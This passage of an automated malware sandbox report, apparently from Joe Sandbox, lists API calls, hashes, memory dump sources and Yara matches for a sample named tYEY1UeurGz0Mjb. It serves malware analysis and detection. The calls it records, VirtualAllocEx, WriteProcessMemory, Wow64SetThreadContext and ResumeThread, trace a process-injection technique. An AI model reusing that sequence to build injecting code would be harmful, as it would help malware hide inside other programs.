                                            • Opcode ID: 61b27293c63eadcb5d6d9c5448c82368acfcc0c14adf6ae7dd21efc46ff8dde1
                                            • Instruction ID: 0255a1e114f85b5f08bfcb0634db92b0c51674515f8ef6aecd687030e0bd55e9
                                            • Opcode Fuzzy Hash: 61b27293c63eadcb5d6d9c5448c82368acfcc0c14adf6ae7dd21efc46ff8dde1
                                            • Instruction Fuzzy Hash: DF5133B1D00319CEEB24CFAAC8847DEBBF1BF48708F20806AD408AB251D7756949CF91

Control-flow Graph (rendered image; node/edge dump omitted): basic blocks 5240aa8-5241e61, calling CreateWindowExW
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05241E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 4d54f260b808ed701f1641218ee8eb1d66de9fc3e72ca1cbdc478bcc51e6fed8
                                            • Instruction ID: f0126756411e9a42ff5e41dfb646a95b8fd93c55d8435aa8d715882e770d67a0
                                            • Opcode Fuzzy Hash: 4d54f260b808ed701f1641218ee8eb1d66de9fc3e72ca1cbdc478bcc51e6fed8
                                            • Instruction Fuzzy Hash: E951E5B1D10309DFDB14CF99C984ADDBBB5FF48300F64812AE819A7250D7759895CF91

Control-flow Graph (rendered image; node/edge dump omitted): basic blocks 5241ce5-5241e61, calling CreateWindowExW
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05241E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: a4ca09983af36f1761c8136de33b4610082260708905fe21a7f2372c13059a88
                                            • Instruction ID: 26c130787a1bdb9dd3c64d48a12cf51f080ca9a6a4d488597c074cecc5d83863
                                            • Opcode Fuzzy Hash: a4ca09983af36f1761c8136de33b4610082260708905fe21a7f2372c13059a88
                                            • Instruction Fuzzy Hash: 3B51D3B5D10309DFDB14CF99C984ADEBBB6FF48300F64812AE819AB250D7759985CF90

Control-flow Graph (rendered image; node/edge dump omitted): basic blocks 5240bfc-52443dc, calling CallWindowProcW
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05244381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: a07e40a00d48cea30806fe3f2a710bc0586258cafccd4318a6973f8c2472207e
                                            • Instruction ID: fac8fe566b55ed153149b5ee86729eab104aad83a08215b68e8fe1d93b7e28ca
                                            • Opcode Fuzzy Hash: a07e40a00d48cea30806fe3f2a710bc0586258cafccd4318a6973f8c2472207e
                                            • Instruction Fuzzy Hash: BB413AB4910205CFDB18DF99C448BAABBF6FF88714F24C459E519AB361D774A841CFA0

Control-flow Graph (rendered image; node/edge dump omitted): basic blocks 13c449c-13c5a61, calling CreateActCtxA
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013C59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: d41e5bcca2db24025818c994d141dc6f20e42f3db78d3d6fbccd73f50fc86562
                                            • Instruction ID: 49aef013b593666d1e02492dc02b04116cec167f7df1754f519a56ec5a03abf6
                                            • Opcode Fuzzy Hash: d41e5bcca2db24025818c994d141dc6f20e42f3db78d3d6fbccd73f50fc86562
                                            • Instruction Fuzzy Hash: 9541F5B0D0071DCBDB24DF9AC8847DDBBB5BF49704F10806AD408AB251D7756949CF91
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07668950
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: fbd7519ea49831df694eedf8c8ef7a52b04b4396e9b07aff54a251b89e4a93f4
                                            • Instruction ID: a179067fe80e0b0ccc64ad153e25cf76bc74d2648e4315b03f127769df0dbc8f
                                            • Opcode Fuzzy Hash: fbd7519ea49831df694eedf8c8ef7a52b04b4396e9b07aff54a251b89e4a93f4
                                            • Instruction Fuzzy Hash: 16216BB59003099FCB10CFAAC885BEEBBF5FF48310F508429E959A7340D778A944CBA1
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076687A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 2d11d9bfc39ea48d90deb95eb72c29b55ea46c9f28565754ac5faf3f2438de0a
                                            • Instruction ID: eef7fbf695d5f8222a8e0ede53b726f72726e0d21db93e257f98c9a8ca2d7670
                                            • Opcode Fuzzy Hash: 2d11d9bfc39ea48d90deb95eb72c29b55ea46c9f28565754ac5faf3f2438de0a
                                            • Instruction Fuzzy Hash: 762159B59002099FCB10DFAAC4857EEBFF5EF88310F50842AD419A7240CB789985CFA1
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07668950
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 353d9a6e1a43112dc03dc1950969584dbc0f3ad1db3745858c1ee30216163bf7
                                            • Instruction ID: 06d9245730047f3ad1e744dbac6660f7cf4d73b644fdd920688e9aed2309b03c
                                            • Opcode Fuzzy Hash: 353d9a6e1a43112dc03dc1950969584dbc0f3ad1db3745858c1ee30216163bf7
                                            • Instruction Fuzzy Hash: 4A2139B19003499FCB10DFAAC885BEEBBF5FF48310F508429E959A7240D778A944CBA1
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07668A30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: eaf981df90b3c744554f0dae66168ef02a427f1403dda517ea69f99dead9c908
                                            • Instruction ID: e453c9ddcd671f2121a60d8015c71a8b5dbdb1c3643a5cd5cc0ae38319678cfe
                                            • Opcode Fuzzy Hash: eaf981df90b3c744554f0dae66168ef02a427f1403dda517ea69f99dead9c908
                                            • Instruction Fuzzy Hash: 8C2139B5C002499FCB10DFAAC885AEEFBF5FF4C310F50842AE919A7240C7399945CBA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD2C6,?,?,?,?,?), ref: 013CD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 200cad56681de9f745556cb18f87d1dbcafd3280aaa2729f96aef56ff7bed8ff
                                            • Instruction ID: 22c15c460bd805bdf23e96e0d3ce588614e8bcebdbe15e94abcf958d41b822f8
                                            • Opcode Fuzzy Hash: 200cad56681de9f745556cb18f87d1dbcafd3280aaa2729f96aef56ff7bed8ff
                                            • Instruction Fuzzy Hash: C521E6B59003089FDB10CF9AD984ADEBFF9FB48710F14841AE918A7350D378A954CFA5
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076687A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: f04955a9517e17b8ee2f09af9860c3baaf49d1f2fc3b938ef2cf948702585eda
                                            • Instruction ID: 78ae2e51637c6cb2da234e38ae6bbf1a586a2aadeb5ab087d541fc6a9a2f55df
                                            • Opcode Fuzzy Hash: f04955a9517e17b8ee2f09af9860c3baaf49d1f2fc3b938ef2cf948702585eda
                                            • Instruction Fuzzy Hash: 592135B1D002098FDB10DFAAC4857EEBFF5EF88310F54842AD419A7240CB78A984CFA1
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07668A30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 10340c978d745f578b33fe3315e6a9a44360fc5a8ceb89b4014845149e4d6e58
                                            • Instruction ID: d688d2bfa3d4637558cfd75f9453839416b8b9dc862b1dd050c223eae8f3b295
                                            • Opcode Fuzzy Hash: 10340c978d745f578b33fe3315e6a9a44360fc5a8ceb89b4014845149e4d6e58
                                            • Instruction Fuzzy Hash: DE2137B1C003499FCB10DFAAC885AEEFBF5FF48310F50842AE919A7240C7389944CBA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD2C6,?,?,?,?,?), ref: 013CD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: a0398befbd4d02868215a8ff972dcf49948131c173d3a7134991c03cda86bfc8
                                            • Instruction ID: 000fac00cb1e6f59e59878056462fc538f9eb744469d57845ddc9bb4d61f0b48
                                            • Opcode Fuzzy Hash: a0398befbd4d02868215a8ff972dcf49948131c173d3a7134991c03cda86bfc8
                                            • Instruction Fuzzy Hash: FB21E2B59002089FDB10CFAAD984ADEBBF5FB48714F14841AE918A3350D378A954CFA1
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766886E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 985383cab195925cbdf3a27059ec02f268ea57162f0d13e72d43ac7fbdd6e9b6
                                            • Instruction ID: 64214668a52f9b94f2905a8f5d3adbb59df5c244bd7d53bee578753b0de608a0
                                            • Opcode Fuzzy Hash: 985383cab195925cbdf3a27059ec02f268ea57162f0d13e72d43ac7fbdd6e9b6
                                            • Instruction Fuzzy Hash: DA1159B19002499FCB10DFAAC8447EEBFF5EF88710F24881EE519A7250C73A9540CFA1
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013CB101,00000800,00000000,00000000), ref: 013CB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 0141c018effe1685a1370d9508a5197d0db3d51e1cbf4919a38575757d175465
                                            • Instruction ID: c933a5e28a691b810bb0ad6746a7b70b9d99bcbb10e5dd661129f12810a40212
                                            • Opcode Fuzzy Hash: 0141c018effe1685a1370d9508a5197d0db3d51e1cbf4919a38575757d175465
                                            • Instruction Fuzzy Hash: 3A1114B68003488FDB10CF9AC445ADEFBF9EB48714F10842ED919A7200C379A945CFA5
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013CB101,00000800,00000000,00000000), ref: 013CB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 4d458dc65385e0bdf6bd0c6506c1d58c4571282e49108d8ca113185626ebf8a0
                                            • Instruction ID: 7ae984d3a5539cf3770d2248ff749c23745c02915b19cc92e35d64f3bc810f03
                                            • Opcode Fuzzy Hash: 4d458dc65385e0bdf6bd0c6506c1d58c4571282e49108d8ca113185626ebf8a0
                                            • Instruction Fuzzy Hash: AF1114B68002488FDB10CFAAC844ADEFBF9EB48710F14841EE959A7200C379A545CFA5
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766886E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 09c2a1b15d5225454f9d38cfb1c9e53d49be5002402c69006dfa0d33509d42c6
                                            • Instruction ID: cf2fec990bc3b8099758163ade2f94fffce02b1d0a39f9cdb85a01e53ae9c509
                                            • Opcode Fuzzy Hash: 09c2a1b15d5225454f9d38cfb1c9e53d49be5002402c69006dfa0d33509d42c6
                                            • Instruction Fuzzy Hash: 321137B19002499FCB10DFAAC845AEEBFF5FF88710F148819E519A7250C779A944CFA1
                                            APIs
                                            • ResumeThread.KERNELBASE(00000067), ref: 076686DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: c1f55ad948bf9d17dcd5ff5d65c220d2a9ececba1db47d2561d149ec4a8e81ad
                                            • Instruction ID: 3ac5dc90464f7eff938e111e9ee24ee9a7cca4fdda663089469ac88ccfd25a6c
                                            • Opcode Fuzzy Hash: c1f55ad948bf9d17dcd5ff5d65c220d2a9ececba1db47d2561d149ec4a8e81ad
                                            • Instruction Fuzzy Hash: 10115BB19002498FCB14DFAAC4457EEFFF5AF88320F20841AD45AB7240C7399544CB95
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0766BAF1,?,?), ref: 0766BC98
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 425879ae33ed83dd8d0773aaa9ec751a0cd59be5c00fffd1d69bace9db15cb6f
                                            • Instruction ID: 6d84ba1dbb4c4efb0b27b7d24694bd67dfc2bef588329624c756edb6063c9631
                                            • Opcode Fuzzy Hash: 425879ae33ed83dd8d0773aaa9ec751a0cd59be5c00fffd1d69bace9db15cb6f
                                            • Instruction Fuzzy Hash: 021125B1800649DFDB10DF9AC549BEEBBF4EB48320F208819D959A7340D779AA44CFA5
                                            APIs
                                            • ResumeThread.KERNELBASE(00000067), ref: 076686DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: e6f714bc6a068b5bc41e2094aee2f592b2dc85614be6c53a8bad36ac40269eae
                                            • Instruction ID: f4041c70484cef9ac65288d5944d1a5f8ad6fdbff32c52442b241dcd9e5835a6
                                            • Opcode Fuzzy Hash: e6f714bc6a068b5bc41e2094aee2f592b2dc85614be6c53a8bad36ac40269eae
                                            • Instruction Fuzzy Hash: 0E113AB1D002498FCB10DFAAC4457EEFBF5EF88314F208419D51AA7240CB79A544CBA5
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013CB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: e90cd9ad63d41990e6069c6c7de41de678bbadce677bf220ee98ef0a8c009b4a
                                            • Instruction ID: 19576bbee06e010b210fc456c1b1928a2c3c2f22ed6ab53a92be393bf2142773
                                            • Opcode Fuzzy Hash: e90cd9ad63d41990e6069c6c7de41de678bbadce677bf220ee98ef0a8c009b4a
                                            • Instruction Fuzzy Hash: 351132B6C003488FDB20CFAAC444ADEFBF4EB48614F10841AD969A3200C379A549CFA1
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0766BAF1,?,?), ref: 0766BC98
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766B26D
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013CB086
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766B26D

                                            Execution Graph

                                            Execution Coverage: 1.4%
                                            Dynamic/Decrypted Code Coverage: 2.7%
                                            Signature Coverage: 6.3%
                                            Total number of Nodes: 554
                                            Total number of Limit Nodes: 68
100004->100083 100006 408563 100006->99999 100007 414a50 8 API calls 100006->100007 100008 4085b8 100007->100008 100008->99960 100009->99960 100011 41bf90 2 API calls 100010->100011 100012 419897 100011->100012 100038 409310 100012->100038 100014 4198b2 100015 4198f0 100014->100015 100016 4198d9 100014->100016 100019 41bd40 2 API calls 100015->100019 100017 41bdc0 2 API calls 100016->100017 100018 4198e6 100017->100018 100018->99981 100020 41992a 100019->100020 100021 41bd40 2 API calls 100020->100021 100022 419943 100021->100022 100026 419be4 100022->100026 100044 41bd80 100022->100044 100025 419bd0 100027 41bdc0 2 API calls 100025->100027 100029 41bdc0 2 API calls 100026->100029 100028 419bda 100027->100028 100028->99981 100030 419c39 100029->100030 100030->99981 100032 40829f 100031->100032 100033 4081b5 100031->100033 100032->99983 100033->100032 100034 414a50 8 API calls 100033->100034 100035 408222 100034->100035 100036 41bdc0 2 API calls 100035->100036 100037 408249 100035->100037 100036->100037 100037->99983 100039 409335 100038->100039 100040 40acf0 LdrLoadDll 100039->100040 100041 409368 100040->100041 100043 40938d 100041->100043 100047 40cf20 100041->100047 100043->100014 100045 419bc9 100044->100045 100065 41a580 100044->100065 100045->100025 100045->100026 100048 40cf4c 100047->100048 100049 41a1e0 LdrLoadDll 100048->100049 100050 40cf65 100049->100050 100051 40cf6c 100050->100051 100058 41a220 100050->100058 100051->100043 100055 40cfa7 100056 41a490 2 API calls 100055->100056 100057 40cfca 100056->100057 100057->100043 100059 41af60 LdrLoadDll 100058->100059 100060 41a23c 100059->100060 100064 1a12ca0 LdrInitializeThunk 100060->100064 100061 40cf8f 100061->100051 100063 41a810 LdrLoadDll 100061->100063 100063->100055 100064->100061 100066 41af60 LdrLoadDll 100065->100066 100067 41a59c 100066->100067 100070 1a12f90 LdrInitializeThunk 100067->100070 100068 41a5b7 100068->100045 100070->100068 100072 408328 100071->100072 100073 40acf0 LdrLoadDll 
100072->100073 100074 408343 100073->100074 100075 414e50 LdrLoadDll 100074->100075 100076 408353 100075->100076 100077 40835c PostThreadMessageW 100076->100077 100078 408370 100076->100078 100077->100078 100078->99997 100080 40f683 100079->100080 100086 419e90 100080->100086 100084 41af60 LdrLoadDll 100083->100084 100085 419d6c 100084->100085 100085->100006 100087 41af60 LdrLoadDll 100086->100087 100088 419eac 100087->100088 100091 1a12dd0 LdrInitializeThunk 100088->100091 100089 40f6ae 100089->99997 100091->100089 100092->99929 100094 41af60 LdrLoadDll 100093->100094 100095 419fdc 100094->100095 100098 1a12f30 LdrInitializeThunk 100095->100098 100096 40f4fe 100096->99934 100096->99936 100098->100096 100099->99941 100100->99946 100101->99951 100104 1a12ad0 LdrInitializeThunk

                                            Control-flow Graph
                                            control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                            Control-flow Graph
                                            control_flow_graph 3 41a40a-41a459 call 41af60 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: ce735585b3023d6dfb68a191c91debb73d53f4d81da64b9bfcb1c2b10b6c50f9
                                            • Instruction ID: 745eb3f05450c579891509d8f425d3f1f2555e57fdcff50e7bbe5f5739733a6a
                                            • Opcode Fuzzy Hash: ce735585b3023d6dfb68a191c91debb73d53f4d81da64b9bfcb1c2b10b6c50f9
                                            • Instruction Fuzzy Hash: ECF0F9B6204148ABCB04DF99DC90CEB77ADEF8D314B158749FE5D93202C634E8558BA0

                                            Control-flow Graph
                                            control_flow_graph 227 40acf0-40ad19 call 41cc50 230 40ad1b-40ad1e 227->230 231 40ad1f-40ad2d call 41d070 227->231 234 40ad3d-40ad4e call 41b4a0 231->234 235 40ad2f-40ad3a call 41d2f0 231->235 240 40ad50-40ad64 LdrLoadDll 234->240 241 40ad67-40ad6a 234->241 235->234 240->241
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

                                            Control-flow Graph
                                            control_flow_graph 242 41a48c-41a48d 243 41a4d6-41a4fd call 41af60 242->243 244 41a48f-41a4b9 call 41af60 NtClose 242->244 244->243
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: b8ff4bae4c8e2bd49781e096f4db219384d3e0bbddf7d3dc62efdcff8fcdbb2b
                                            • Instruction ID: 4a912bd7cef69b23412329667c7c7fb5ddc7ee147841c2af3048b3f02d115080
                                            • Opcode Fuzzy Hash: b8ff4bae4c8e2bd49781e096f4db219384d3e0bbddf7d3dc62efdcff8fcdbb2b
                                            • Instruction Fuzzy Hash: E8F03CB5600108ABDB14DF98DC81DEB77B9EF88714F14855AFD0D97201D634E9218BA0

                                            Control-flow Graph
                                            control_flow_graph 250 41a360-41a3b1 call 41af60 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

                                            Control-flow Graph
                                            control_flow_graph 266 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
